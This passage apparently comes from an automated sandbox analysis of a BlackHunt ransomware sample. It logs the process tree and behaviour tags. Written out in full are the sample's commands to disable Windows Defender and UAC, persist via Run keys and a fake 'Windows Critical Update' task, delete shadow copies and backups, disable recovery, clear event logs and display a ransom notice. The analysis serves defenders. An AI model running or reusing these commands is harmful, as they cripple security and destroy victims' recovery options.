wrote to memory of 1936 2828 cmd.exe 117 PID 2828 wrote to memory of 1936 2828 cmd.exe 117 PID 3608 wrote to memory of 1796 3608 cmd.exe 116 PID 3608 wrote to memory of 1796 3608 cmd.exe 116 PID 1592 wrote to memory of 3036 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 118 PID 1592 wrote to memory of 3036 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 118 PID 4432 wrote to memory of 1392 4432 cmd.exe 180 PID 4432 wrote to memory of 1392 4432 cmd.exe 180 PID 640 wrote to memory of 2052 640 vssadmin.exe 120 PID 640 wrote to memory of 2052 640 vssadmin.exe 120 PID 1592 wrote to memory of 3620 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 124 PID 1592 wrote to memory of 3620 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 124 PID 2132 wrote to memory of 3244 2132 cmd.exe 123 PID 2132 wrote to memory of 3244 2132 cmd.exe 123 PID 3084 wrote to memory of 432 3084 cmd.exe 125 PID 3084 wrote to memory of 432 3084 cmd.exe 125 PID 1592 wrote to memory of 3624 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 126 PID 1592 wrote to memory of 3624 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 126 PID 3036 wrote to memory of 3064 3036 cmd.exe 128 PID 3036 wrote to memory of 3064 3036 cmd.exe 128 PID 1592 wrote to memory of 1928 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 129 PID 1592 wrote to memory of 1928 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 129 PID 3620 wrote to memory of 2896 3620 cmd.exe 131 PID 3620 wrote to memory of 2896 3620 cmd.exe 131 PID 1592 wrote to memory of 3176 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 132 PID 1592 wrote to memory of 3176 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 132 PID 1592 wrote to memory of 1704 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 134 PID 1592 wrote to memory of 1704 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 134 PID 1592 wrote to memory of 4724 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 136 PID 1592 wrote to memory of 4724 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 136 PID 1592 wrote to memory of 3312 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 139 PID 1592 wrote to memory of 3312 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 139 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe"C:\Users\Admin\AppData\Local\Temp\4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1928
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3176
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3312
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:5076
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4220
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2340
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:3292 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe" /F2⤵PID:2936
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe" /F3⤵
- Creates scheduled task(s)
PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4908
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:852
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1392
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2216
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2880
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5036
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2812
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:956
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3588
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4844
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:8524
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:8744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4112
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5956
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7708
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8048
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:6708
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:7800
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10372
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7420
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:11512
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2664
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:6648
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5832
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:10356
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:8584
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:6280
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:8944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:8756
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5624 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 14484⤵
- Program crash
PID:2760
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8896
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:5384
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:7848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:6496
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5860
-
-
-
